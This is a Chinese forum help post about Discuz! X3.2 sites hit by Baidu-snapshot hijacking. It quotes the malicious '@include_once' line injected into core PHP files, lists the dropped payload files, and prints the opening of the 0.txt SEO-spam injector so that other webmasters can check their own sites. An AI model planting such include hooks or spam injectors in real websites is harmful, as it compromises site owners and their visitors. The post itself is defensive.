求助

Discuz!论坛百度快照劫持解决方法

Discuz!教程  / DZ教程  / 倒序浏览   © 著作权归作者本人所有

#楼主# 2019-1-14

跳转到指定楼层

本站会员必须 邮箱验证成功后 才能发帖。马上注册查阅更多教程,下载海量资源,让你轻松玩做站

您需要 登录 才可以下载或查看,没有帐号?立即注册

x

批量DZ站被挂马,请各位站长检查下,后台-工具-文件校验,看看那些是被改动的PHP文件检查下
有没有被挂马
我在自己站的感染文件里有其他DZ站的网址,联系了以后发现果然如此,我联系到2个站长了,都DZ3.2
开始怀疑插件,但另外一个站长,被黑6月1日重装了,还没第3方插件只官方的QQ互联,只装了第3方手机模板,仍然再次被黑。
漏洞并不在被感染的文件,现在怀疑UCenter,Discuz uc.key泄露导致代码注入漏洞,因为DZ3.2到2016年6月1日就不更新了。但是最后更新Discuz! X3.2 R20160601里 uc.php漏洞已经修复了。
怕memcache+ssrf GETSHELL漏洞漏洞现在停了memcache,没用。
总之还找不到头绪,希望各位站长检查下自己的网站,群策群力,给给建议。

一般是感染了 source/class/class_core.php 或config/config_global.php 或其他核心PHP文件加了一句话 include_once 引用了 /某目录/某目录/0.txt
内容就这一句

@include_once("你的某个可写目录/0.txt");
复制代码


文件目录都是变的,但是代码不变,最有可能是 /data/avatar
建立了以下文件,
/某目录/某目录/0.txt
/某目录/某目录/1.jpg
/某目录/某目录/2.jpg
/某目录/某目录/3.jpg
/某目录/某目录/4.jpg
/某目录/某目录/work/zi_1.txt
/某目录/某目录/work/zi_2.txt
/某目录/某目录/work/zi_3.txt
/某目录/某目录/work/zi_4.txt
/某目录/某目录/work/zi_5.txt
/某目录/某目录/work/zi_6.txt
/某目录/某目录/work/zi_7.txt
/某目录/某目录/work/zi_8.txt

你删除没用,大约半小时他重新给你下马

1.jpg 等是文本文件,有PHP广告内容,有其他网站的内容
/work/目录下都是广告标题文字,基本是违法的广告

0.txt 开头内容如下
  1. <?php

  2. ini_set('html_errors', false);
  3. ini_set('display_errors', false);
  4. define("APP_INCLUDE_FLAG", "TRUE");
  5. define('APP_JACK_CHARSET', 'GBK');
  6. define('APP_JACK_DOCUMENTROOT','/0.txt所在目录/');
  7. define('APP_JACK_TEMPLATE', APP_JACK_DOCUMENTROOT . '2.jpg');
  8. define('APP_JACK_ARTICLE', APP_JACK_DOCUMENTROOT . '3.jpg');
  9. define('APP_JACK_DES', APP_JACK_DOCUMENTROOT . 'miaoshu.txt');
  10. define('APP_JACK_BIANLIANG', APP_JACK_DOCUMENTROOT . '4.jpg');
  11. define('APP_JACK_BIANLIANG_B', APP_JACK_DOCUMENTROOT . 'bianliang2.txt');
  12. define('APP_JACK_BIANLIANG_C', APP_JACK_DOCUMENTROOT . 'bianliang3.txt');
  13. define('APP_MIX_KWD_FILE', APP_JACK_DOCUMENTROOT . 'hunhe.txt');
  14. define('APP_JACK_CACHED', 'Uncached');
  15. define('APP_JACK_MIN_PAR', '3');
  16. define('APP_JACK_MAX_PAR', '3');
  17. define('APP_JACK_MIN', '10');
  18. define('APP_JACK_MAX', '15');
  19. define('APP_JACK_OPENWL', '1');
  20. define('APP_JACK_APPFILE', APP_JACK_DOCUMENTROOT . '1.jpg');
  21. function App_GetLink()
  22. {
  23. $site = array();
  24. $site[] = 'http://你或别人的网址/thread-' . mt_rand(1000, 999999999) . '-1-1.html';
  25. $site[] = 'http://你或别人的网址/forum-' . mt_rand(1000, 999999999) . '-1.html';
  26. $site[] = 'http://你或别人的网址/forum.php?mid=' . mt_rand(1000, 999999999) . '/';
  27. $site[] = 'http://你或别人的网址/home.php?mid=' . mt_rand(1000, 999999999) . '/';
  28. $site[] = 'http://你或别人的网址/index.php?' . mt_rand(1000, 999999999) . '/';
  29. return $site[mt_rand(0, count($site) - 1)];
  30. }
  31. function App_GetSelf()
  32. {
  33. $site = array();
  34. $site[] = 'http://你或别人的网址/thread-' . mt_rand(1000, 999999999) . '-1-1.html';
  35. $site[] = 'http://你或别人的网址/forum-' . mt_rand(1000, 999999999) . '-1.html';
  36. $site[] = 'http://你或别人的网址/forum.php?mid=' . mt_rand(1000, 999999999) . '/';
  37. $site[] = 'http://你或别人的网址/home.php?mid=' . mt_rand(1000, 999999999) . '/';
  38. $site[] = 'http://你或别人的网址/index.php?' . mt_rand(1000, 999999999) . '/';
  39. return $site[mt_rand(0, count($site) - 1)];
  40. }
  41. function getImg()
复制代码




另外,有任意名字的php文件后门,大家可以搜下里面关键词maxfile ,2000000 等看看有没有中枪
宝塔服务器面板,一键全能部署及管理,送你¥3188礼包,点我领取
转播转播 分享淘帖
回复

使用道具

成为第一个回答人

B Color Link Quote Code Smilies
关闭

站长推荐上一条 /3 下一条